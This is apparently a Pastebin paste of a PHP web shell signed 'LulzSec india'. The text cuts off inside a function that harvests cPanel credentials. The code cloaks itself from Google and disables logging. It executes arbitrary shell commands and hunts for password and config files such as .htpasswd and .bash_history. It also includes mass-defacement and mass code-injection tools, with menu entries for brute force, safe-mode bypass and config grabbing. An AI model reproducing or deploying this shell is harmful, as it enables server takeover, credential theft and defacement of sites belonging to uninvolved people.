daily pastebin goal
26%
SHARE
TWEET

Untitled

a guest Sep 20th, 2016 140 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3.  
  4. $color = "#56A3E9;text-shadow:blue 0px 0px 10px"; /* "color:White #56A3E9;font-family:Iceland;text-shadow:red 0px 0px 10px" "font-size: 50pt;" */
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8.     header('HTTP/1.0 404 Not Found');
  9.     exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('display_errors',0);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @set_time_limit(0);
  18. @set_magic_quotes_runtime(0);
  19. @define('VERSION', 'Ver 4.0');
  20. if( get_magic_quotes_gpc() ) {
  21.     function stripslashes_array($array) {
  22.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  23.     }
  24.     $_POST = stripslashes_array($_POST);
  25. }
  26. function printLogin() {
  27.     echo '
  28.    
  29.       <!-- LulzSec india--> <html>
  30.    <head>
  31.    <SCRIPT type=text/javascript> function tb8_makeArray(n){ this.length = n; return this.length; } tb8_messages = new tb8_makeArray(3); tb8_messages[0] = "Hacked by LulzSec india"; tb8_messages[1] = ""; tb8_messages[2] = ""; tb8_rptType = "infinite"; tb8_rptNbr = 5; tb8_speed = 100; tb8_delay = 2000; var tb8_counter=1; var tb8_currMsg=0; var tb8_tekst =""; var tb8_i=0; var tb8_TID = null; function tb8_pisi(){ tb8_tekst = tb8_tekst + tb8_messages[tb8_currMsg].substring(tb8_i, tb8_i+1); document.title = tb8_tekst; tb8_sp=tb8_speed; tb8_i++; if (tb8_i==tb8_messages[tb8_currMsg].length){ tb8_currMsg++; tb8_i=0; tb8_tekst="";tb8_sp=tb8_delay; } if (tb8_currMsg == tb8_messages.length){ if ((tb8_rptType == " finite ") && (tb8_counter==tb8_rptNbr)){ clearTimeout(tb8_TID); return; } tb8_counter++; tb8_currMsg = 0; } tb8_TID = setTimeout("tb8_pisi()", tb8_sp); } tb8_pisi() </SCRIPT>
  32.    <title>LulzSec india</title>
  33.    <link href="http://fonts.googleapis.com/css?family=Black+Ops+One" rel="stylesheet" type="text/css">
  34.    <link href="https://fonts.googleapis.com/css?family=Ubuntu+Condensed" rel="stylesheet" type="text/css">
  35.    <link href="http://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet" type="text/css">
  36.    <link href="https://fonts.googleapis.com/css?family=Covered+By+Your+Grace" rel="stylesheet" type="text/css">
  37.    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  38.    <!-- for Facebook -->          
  39. <!-- for Google -->
  40. <meta name="description" content="Hacked by LulzSec india" />
  41. <meta name="keywords" content="indian leet" />
  42.  
  43. <meta name="author" content="LulzSec india" />
  44. <meta name="copyright" content="INDIAN LEET" />
  45. <meta name="application-name" content="Deaface" />
  46.  
  47.  
  48. <!-- for Twitter -->          
  49. <meta name="twitter:card" content="summary" />
  50. <meta name="twitter:title" content="Hacked by LulzSec india" />
  51. <meta name="twitter:description" content="" />
  52. <meta name="twitter:image" content="" />
  53.     <style type="text/css">
  54.    body {       height: 100%;       width: 100%;        margin: 0;      padding: 0;         background-image: url(" ");         background-color: #000000;      background-size: 100%;      background-position: center;        background-repeat: no-repeat;       color: #FFFFFF;         font-family: "Orbitron";        font-size: 14pt;        text-align: center;         text-decoration: none;  }       #greets {       width: 820px;       border-style: outset;   }       #footer {       font-size: 9pt;         opacity: .7;    }       .glow {         text-shadow: 0 0 10px #F59700;      font-family: "Black Ops One";   }       .blueglow {         text-shadow: 0 0 10px #0F6FBD;      font-family: "Black Ops One"    }       .whiteglow {        text-shadow: 0 0 10px #FFFFFF;      font-family: "Black Ops One";   } </style>
  55.    
  56.    <style type="text/css">
  57.         /* Circle Text Styles */
  58.         #outerCircleText {
  59.         /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
  60.         font-style: italic;
  61.         font-weight: bold;
  62.         font-family: "comic sans ms", verdana, arial;
  63.         color: #FFF;
  64.         /* End Optional */
  65.          
  66.         /* Start Required - Do Not Edit */
  67.         position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
  68.         #outerCircleText div {position: relative;}
  69.         #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
  70.         /* End Required */
  71.         /* End Circle Text Styles */
  72.         </style>
  73.          
  74.          
  75.    
  76.    <body>
  77. <embed src=" mp3 " width="0" height="0">
  78.    <center>
  79. <p>
  80. <h2 style="font-family: Black Ops One" style="font-size:25pt;" >
  81.    <span class="glow" style="font-size:30pt;"  >Hindustan Zindabad</span>
  82.    <br><h1> <span class="blueglow" style="front-size:30pt;" > HACKED BY </span> </h1> </br>
  83.    </h2>
  84.    <span class="glow" style="font-size: 70pt;">
  85.    LulzSec india</span>
  86.    <span class="blueglow" style="font-size: 20pt;"><br/>INDIAN LEET </span></br>
  87. <br>
  88. <br><h1>
  89. <span style="color:White;font-family:Iceland;text-shadow:red 0px 0px 10px" "font-size: 50pt;">TEAM LulzSec
  90. <br> दूध मांगोगे खीर देंगे, कश्मीर मांगोगे तो चीर देंगे</span></h1>
  91. <h1 class="glow"> <br>हिंदुस्तान जिंदाबाद <br>ہندوستان زندہ باد</h1>
  92. <br> owned  </br>
  93. </strong></font></b></p>
  94.    <br>
  95.    <br>
  96.    <p><b><font color="#FFFFFF" face="Covered By Your Grace"  size="8" ><strong><b> Sleeping Not Dead </font></p>
  97.       <span  style="font-size: 20pt; font-family: Black Ops One;" ></span>
  98.    <br>
  99.    <br /><font color="#FF9933"><b>WE ARE LEGION | </b></font><font color="#FFFFFF"><b>WE DO NOT FORGIVE | WE DO NOT FORGET </b></font><font color="#138808"><b>| EXPECT US</b></font><br />
  100.    <script language="JavaScript1.2">        var msg="LEL"       var neonbasecolor="white"       var neontextcolor="grey"        var neontextcolor2="#F59700"        var flashspeed=100              </script>
  101.    </p>
  102.    <hr />
  103.    <div id="greets">
  104.    <span class="blueglow">TEAM MEMBERS</span>       <br />      <marquee width=820px scrollAmount=4 scrollDelay=50>         <span style="font-size:10pt;">| LulzSec india| HEXKING | Mr.PO PANDA | GABBER HEXOR | PHONEIX |</span>      </marquee>  </div>
  105.    </center>
  106.    </html> <style>input { margin:5;background-color:#000;border:none;color:#0000; cursor:arrow; }</style>
  107.           <center><form method=post><input type=password name=pass></form>
  108. </body>
  109.     ';
  110.     exit;
  111. }
  112. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  113.     if( empty( $auth_pass ) ||
  114.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  115.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  116.     else
  117.         printLogin();
  118. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  119.     $os = 'win';
  120. else
  121.     $os = 'nix';
  122. $safe_mode = @ini_get('safe_mode');
  123. $disable_functions = @ini_get('disable_functions');
  124. $home_cwd = @getcwd();
  125. if( isset( $_POST['c'] ) )
  126.     @chdir($_POST['c']);
  127. $cwd = @getcwd();
  128. if( $os == 'win') {
  129.     $home_cwd = str_replace("\\", "/", $home_cwd);
  130.     $cwd = str_replace("\\", "/", $cwd);
  131. }
  132. if( $cwd[strlen($cwd)-1] != '/' )
  133.     $cwd .= '/';
  134. if($os == 'win') {
  135.     $aliases = array(
  136.         "Mass Deface" => 'for /r "%cd%" %i in (.) do @copy "%cd%\POPANDA.html" "%i"',
  137.         "Find index.php in current dir" => "dir /s /w /b index.php",
  138.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  139.         "Show active connections" => "netstat -an",
  140.         "Show running services" => "net start",
  141.         "User accounts" => "net user",
  142.         "Show computers" => "net view",
  143.         "ARP Table" => "arp -a",
  144.         "IP Configuration" => "ipconfig /all"
  145.     );
  146. } else {
  147.     $aliases = array(
  148.           "List dir" => "ls -la",
  149.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  150.           "show opened ports" => "netstat -an | grep -i listen",
  151.         "Find" => "",
  152.           "find all suid files" => "find / -type f -perm -04000 -ls",
  153.           "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  154.           "find all sgid files" => "find / -type f -perm -02000 -ls",
  155.           "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  156.           "find config.inc.php files" => "find / -type f -name config.inc.php",
  157.           "find config* files" => "find / -type f -name \"config*\"",
  158.           "find config* files in current dir" => "find . -type f -name \"config*\"",
  159.           "find all writable folders and files" => "find / -perm -2 -ls",
  160.           "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  161.           "find all service.pwd files" => "find / -type f -name service.pwd",
  162.           "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  163.           "find all .htpasswd files" => "find / -type f -name .htpasswd",
  164.           "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  165.           "find all .bash_history files" => "find / -type f -name .bash_history",
  166.           "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  167.           "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  168.           "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  169.         "Locate" => "",
  170.           "locate httpd.conf files" => "locate httpd.conf",
  171.         "locate vhosts.conf files" => "locate vhosts.conf",
  172.         "locate proftpd.conf files" => "locate proftpd.conf",
  173.         "locate psybnc.conf files" => "locate psybnc.conf",
  174.         "locate my.conf files" => "locate my.conf",
  175.         "locate admin.php files" =>"locate admin.php",
  176.         "locate cfg.php files" => "locate cfg.php",
  177.         "locate conf.php files" => "locate conf.php",
  178.         "locate config.dat files" => "locate config.dat",
  179.         "locate config.php files" => "locate config.php",
  180.         "locate config.inc files" => "locate config.inc",
  181.         "locate config.inc.php" => "locate config.inc.php",
  182.         "locate config.default.php files" => "locate config.default.php",
  183.         "locate config* files " => "locate config",
  184.         "locate .conf files"=>"locate '.conf'",
  185.         "locate .pwd files" => "locate '.pwd'",
  186.         "locate .sql files" => "locate '.sql'",
  187.         "locate .htpasswd files" => "locate '.htpasswd'",
  188.         "locate .bash_history files" => "locate '.bash_history'",
  189.         "locate .mysql_history files" => "locate '.mysql_history'",
  190.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  191.         "locate backup files" => "locate backup",
  192.         "locate dump files" => "locate dump",
  193.         "locate priv files" => "locate priv"    
  194.     );
  195. }
  196. function ex($in) {
  197.     $out = '';
  198.     if(function_exists('exec')) {
  199.         @exec($in,$out);
  200.         $out = @join("\n",$out);
  201.     }elseif(function_exists('passthru')) {
  202.         ob_start();
  203.         @passthru($in);
  204.         $out = ob_get_clean();
  205.     }elseif(function_exists('system')) {
  206.         ob_start();
  207.         @system($in);
  208.         $out = ob_get_clean();
  209.     }elseif(function_exists('shell_exec')) {
  210.         $out = shell_exec($in);
  211.     }elseif(is_resource($f = @popen($in,"r"))) {
  212.         $out = "";
  213.         while(!@feof($f))
  214.             $out .= fread($f,1024);
  215.         pclose($f);
  216.     }
  217.     return $out;
  218. }
  219. function which($p) {
  220.     $path = ex('which '.$p);
  221.     if(!empty($path))
  222.         return $path;
  223.     return false;
  224. }
  225. function printHeader() {
  226.     if(empty($_POST['charset']))
  227.         $_POST['charset'] = "UTF-8";
  228.     global $color;
  229.     echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>Mr. Po Panda '.VERSION.'</title>
  230.     <style>
  231.         body {background:url(http://store.picbg.net/pubpic/92/39/36c9def2012c9239.jpg);color:gray;}
  232.         body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  233.         span,h1,a    { color:'.$color.' !important; }
  234.         span        { font-weight: bolder; }
  235.         h1            { padding: 2px 5px;font: 14pt Verdana;margin:0px 0 0 5px; }
  236.         div.content    { padding: 5px;margin:0 5px;background: #000000;border-bottom:1px  #56A3E9;}
  237.         a            { text-decoration:none; }
  238.         a:hover        { /*background:aqua;*/ }
  239.         .ml1        { border:1px  #56A3E9;padding:5px;margin:0;overflow: auto; }
  240.         .bigarea    { width:100%;height:250px;margin-top:5px;}
  241.         input, textarea, select    { margin:0;color:aqua;background-color:#000000;border:1px solid '.$color.'; font: 9pt Monospace,"Courier New"; }
  242.         input[type="button"]:hover,input[type="submit"]:hover {background-color:'.$color.';color:#000;}
  243.         form        { margin:0px; }
  244.         #toolsTbl    { text-align:center; }
  245.         .toolsInp    { width: 80%; }
  246.         .main th    {text-align:left;background-color:#000000;font-weight: bold;}
  247.         .main tr:hover{background-color:#5e5e5e;}
  248.         .main td, th{vertical-align:middle;}
  249.         .menu {background: #000;}
  250.         .menu th{padding:5px;font-weight:bold;}
  251.         .menu th:hover{background:#444;}
  252.         .l1 {background-color:#000}
  253.         pre {font-family:Courier,Monospace;}
  254.         #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  255.         .logo {text-align:center;font-size:60px;}
  256.         .logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
  257.         .cpr {margin-bottom:5px;font-weight:bold;}
  258.         .cpb {width:34px;margin:0 5px;}
  259.         .eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
  260.         .eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
  261.         .npoad td {padding:0;}
  262.     </style>
  263.     <script>
  264.         function set(a,c,p1,p2,p3,charset) {
  265.             if(a != null)document.mf.a.value=a;
  266.             if(c != null)document.mf.c.value=c;
  267.             if(p1 != null)document.mf.p1.value=p1;
  268.             if(p2 != null)document.mf.p2.value=p2;
  269.             if(p3 != null)document.mf.p3.value=p3;
  270.             if(charset != null)document.mf.charset.value=charset;
  271.         }
  272.         function g(a,c,p1,p2,p3,charset) {
  273.             set(a,c,p1,p2,p3,charset);
  274.             document.mf.submit();
  275.         }
  276.         function a(a,c,p1,p2,p3,charset) {
  277.             set(a,c,p1,p2,p3,charset);
  278.             var params = "ajax=true";
  279.             for(i=0;i<document.mf.elements.length;i++)
  280.                 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  281.             sr("'.$_SERVER['REQUEST_URI'].'", params);
  282.         }
  283.         function sr(url, params) {    
  284.             if (window.XMLHttpRequest) {
  285.                 req = new XMLHttpRequest();
  286.                 req.onreadystatechange = processReqChange;
  287.                 req.open("POST", url, true);
  288.                 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  289.                 req.send(params);
  290.             }
  291.             else if (window.ActiveXObject) {
  292.                 req = new ActiveXObject("Microsoft.XMLHTTP");
  293.                 if (req) {
  294.                     req.onreadystatechange = processReqChange;
  295.                     req.open("POST", url, true);
  296.                     req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  297.                     req.send(params);
  298.                 }
  299.             }
  300.         }
  301.         function processReqChange() {
  302.             if( (req.readyState == 4) )
  303.                 if(req.status == 200) {
  304.                     //alert(req.responseText);
  305.                     var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  306.                     var arr=reg.exec(req.responseText);
  307.                     eval(arr[2].substr(0, arr[1]));
  308.                 }
  309.                 else alert("Request error!");
  310.         }
  311.     </script>
  312.     <head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:1px;background:#000;"><div class="content" style="border-top:1px  #56A3E9;">
  313.     <form method=post name=mf style="display:none;">
  314.         <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
  315.         <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  316.         <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
  317.         <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
  318.         <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
  319.         <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  320.     </form>';
  321.     $freeSpace = @diskfreespace($GLOBALS['cwd']);
  322.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  323.     $totalSpace = $totalSpace?$totalSpace:1;
  324.     $disable_functions = @ini_get('disable_functions');
  325.     $release = @php_uname('r');
  326.     $kernel = @php_uname('s');
  327.     $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
  328.     if(strpos('Linux', $kernel) !== false)
  329.         $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
  330.     else
  331.         $explink .= urlencode($kernel . ' ' . substr($release,0,3));
  332.     if(!function_exists('posix_getegid')) {
  333.         $user = @get_current_user();
  334.         $uid = @getmyuid();
  335.         $gid = @getmygid();
  336.         $group = "?";
  337.     } else {
  338.         $uid = @posix_getpwuid(@posix_geteuid());
  339.         $gid = @posix_getgrgid(@posix_getegid());
  340.         $user = $uid['name'];
  341.         $uid = $uid['uid'];
  342.         $group = $gid['name'];
  343.         $gid = $gid['gid'];
  344.     }
  345.     $cwd_links = '';
  346.     $path = explode("/", $GLOBALS['cwd']);
  347.     $n=count($path);
  348.     for($i=0;$i<$n-1;$i++) {
  349.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  350.         for($j=0;$j<=$i;$j++)
  351.             $cwd_links .= $path[$j].'/';
  352.         $cwd_links .= "\")'>".$path[$i]."/</a>";
  353.     }
  354.     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  355.     $opt_charsets = '';
  356.     foreach($charsets as $item)
  357.         $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  358.     $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Infect'=>'Infect','CgiShell'=>'CgiShell','Shared Hostings'=>'Shared','Grab Configs'=>'ConfigGrabber','Safe Mode'=>'Bypass','Sql'=>'Sql','Subdomain'=>'Subdomain','LFI'=>'lfiscan','Brute'=>'Bruteforce','CP' => 'CP','Readable'=>'Readable','Mass Defacer'=>'Deface','Recursive Defacer'=>'Defacer','String tools'=>'StringTools','Jumping'=>'Jumping','Injector'=>'Injector','Connect'=>'Network','Port Scanner'=>'PortScanner','R.D.P'=>'rdp','Domain' => 'Domain');
  359.     if(!empty($GLOBALS['auth_pass']))
  360.     $m['Logout'] = 'Logout';
  361.  
  362.     $menu = '';
  363.     foreach($m as $k => $v)
  364.         $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
  365.     $drives = "";
  366.     if ($GLOBALS['os'] == 'win') {
  367.         foreach( range('a','z') as $drive ){
  368.             if (is_dir($drive.':\\'))
  369.                 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  370.         }
  371.         $drives .= '<br />: ';
  372.        
  373.         // test  start
  374.        
  375.        
  376.             $m2 = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan');
  377.     $menu2 = '';
  378.     foreach($m2 as $k2 => $v2)
  379.         $menu2 .= '<th><a href="#" onclick="g(\''.$v2.'\',null,\'\',\'\',\'\')">'.$k2.'</a></th>';
  380.    
  381.  
  382.        
  383.         // test end
  384.     }
  385.     if($GLOBALS['os'] == 'nix') {
  386.         $dominios = @file_get_contents("/etc/named.conf");
  387.         if(!$dominios) {
  388.             $d0c = "CANT READ named.conf";
  389.         } else {
  390.             @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  391.             $out = sizeof(array_unique($out[1]));
  392.             $d0c = $out."  Domains";
  393.         }
  394.     } else {
  395.         $d0c = " --- ";
  396.     }
  397.     if($GLOBALS['os'] == 'nix' )
  398.     {
  399.         $usefl = ''; $dwnldr = '';
  400.         if(!@ini_get('safe_mode')) {
  401.             $temp = array();
  402.             $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  403.             foreach($userful as $item) { if(which($item)) $temp[]= $item; }
  404.             $usefl = implode(', ',$temp);
  405.             $temp = array();
  406.             $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  407.             foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
  408.             $dwnldr = implode(', ',$temp);
  409.         } else {
  410.             $usefl = ' ------- '; $dwnldr = ' ------- ';
  411.         }
  412.     } else {
  413.         $usefl = ' ------- '; $dwnldr = ' ------- ';
  414.     }
  415.    
  416.     echo '<table class="info" cellpadding="0" cellspacing="0" width="100%" bgcolor="black"><tr><td width="160px"><img src="http://i.giphy.com/l2Sq1rpEhjQpZxczK.gif" height="150" width="150"><sup>&reg;</sup></div></td>
  417.           <td><table cellpadding="0" cellspacing="0" class="npoad"><tr><td width="125px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).' <a href="' . $explink . '" target=_blank>[exploit-db.com]'.'</nobr></td></tr>
  418.           <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
  419.          '<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
  420.          '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table>'.
  421.          '</div></div><div style="margin:1;background #000;"><div class="content" style="border-top:1px  #56A3E9;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'.</tr></table></div></div><div style="margin:2;background:#000;">'
  422.          .'<div style="margin:1;background #000;"><div class="content" style="border-top:1px  #56A3E9;padding:2px;">';
  423.                             // menu2 is there but cant set it :(
  424.          }
  425.  
  426.  
  427. function actionInjector(){
  428.     printHeader();
  429.     echo '<center><h1>Mass Code Injector By LulzSec 2016 </h1></center>';
  430.     echo '<div class="content">';
  431.    
  432.     if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
  433.     function get_structure($path,$depth) {
  434.         global $DS;
  435.         $res = array();
  436.         if(in_array(0, $depth)) { $res[] = $path; }
  437.         if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
  438.             $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
  439.             if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
  440.         }
  441.         if(in_array(2, $depth) or in_array(3, $depth)) {
  442.             $tmp2 = array();
  443.             foreach($tmp1 as $t){
  444.                 $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
  445.                 $tmp2 = array_merge($tmp2, $tp2);
  446.             }
  447.             if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
  448.         }
  449.         if(in_array(3, $depth)) {
  450.             $tmp3 = array();
  451.             foreach($tmp2 as $t){
  452.                 $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
  453.                 $tmp3 = array_merge($tmp3, $tp3);
  454.             }
  455.             $res = array_merge($res,$tmp3);
  456.         }
  457.         return $res;
  458.     }
  459.  
  460.     if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
  461.         $name = $_POST['name'] ? $_POST['name'] : '*';
  462.         $type = $_POST['type'] ? $_POST['type'] : 'html';
  463.         $path = $_POST['path'] ? $_POST['path'] : getcwd();
  464.         $code = $_POST['code'] ? $_POST['code'] : '3xp1r3 Cyber Army';
  465.         $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
  466.         $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
  467.         $dt = get_structure($path,$depth);
  468.         foreach ($dt as $d) {
  469.             if($mode == 'a') {
  470.                 if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
  471.                     echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:#a3e956;"> was injected</span></div>';
  472.                 } else {
  473.                     echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  474.                 }
  475.             } else {
  476.                 if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
  477.                     echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:#a3e956;"> was injected</span></div>';
  478.                 } else {
  479.                     echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  480.                 }
  481.             }        
  482.         }
  483.     } else {
  484.         echo '<form method="post" action="">
  485.                 <table align="center">
  486.                     <tr>
  487.                         <td>Directory : </td>
  488.                         <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
  489.                     </tr>
  490.                     <tr>
  491.                         <td class="title">Mode : </td>
  492.                         <td>
  493.                             <select style="width: 100px;" name="mode" class="box">
  494.                                 <option value="a">Apender</option>
  495.                                 <option value="w">Overwriter</option>
  496.                             </select>
  497.                         </td>
  498.                     </tr>
  499.                     <tr>
  500.                         <td class="title">File Name & Type : </td>
  501.                         <td>
  502.                             <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
  503.                             <select style="width: 100px;" name="type" class="box">
  504.                             <option value="html">HTML</option>
  505.                             <option value="htm">HTM</option>
  506.                             <option value="php" selected="selected">PHP</option>
  507.                             <option value="asp">ASP</option>
  508.                             <option value="aspx">ASPX</option>
  509.                             <option value="xml">XML</option>
  510.                             <option value="txt">TXT</option>
  511.                         </select></td>
  512.                     </tr>
  513.                     <tr>
  514.                         <td class="title">Code Inject Depth : </td>
  515.                         <td>
  516.                             <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
  517.                             <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
  518.                             <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
  519.                             <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
  520.                         </td>
  521.                     </tr>        
  522.                     <tr>
  523.                         <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
  524.                     </tr>                        
  525.                     <tr>
  526.                         <td colspan="2" style="text-align: center;">
  527.                             <input type="hidden" name="a" value="Injector">
  528.                             <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  529.                             <input type="hidden" name="p1">
  530.                             <input type="hidden" name="p2">
  531.                             <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  532.                             <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
  533.                     </tr>
  534.                 </table>
  535.         </form>';
  536.     }
  537.     echo '</div>';
  538.     printFooter();
  539. }
  540.  
  541.  
  542. function actionCP() {
  543.  
  544. printHeader();
  545.  
  546.  
  547. echo "<html>
  548. <style type='text/css'>
  549.    body {       height: 100%;       width: 100%;        margin: 0;      padding: 0;         background-image: url(' ');
  550.    <style type='text/css'>
  551.         /* Circle Text Styles */
  552.         #outerCircleText {
  553.         /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
  554.         font-style: italic;
  555.         font-weight: bold;
  556.         font-family: 'comic sans ms', verdana, arial;
  557.         color: #FFF;
  558.         /* End Optional */
  559.          
  560.         /* Start Required - Do Not Edit */
  561.         position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
  562.         #outerCircleText div {position: relative;}
  563.         #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
  564.         /* End Required */
  565.         /* End Circle Text Styles */
  566.         </style>
  567.  
  568.  
  569. <center><marquee bgcolor='black' width='30%'><span style='font-size: 25px;'><b>
  570. <span style='color:White;font-family:Iceland;text-shadow:red 0px 0px 5px' 'font-size:='' 20pt;'=''>Powered by LulzSec India</span></marquee></center>
  571. <body>";
  572.  
  573. @ini_set('display_errors',0);
  574. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  575.     $ar0=explode($marqueurDebutLien, $text);
  576.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  577.     return trim($ar1[0]);
  578. }
  579.  echo "<center>";
  580. $d0mains = @file('/etc/named.conf');
  581. $domains = scandir("/var/named");
  582.  
  583. if ($domains or $d0mains)
  584. {
  585.     $domains = scandir("/var/named");
  586.     if($domains) {
  587. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
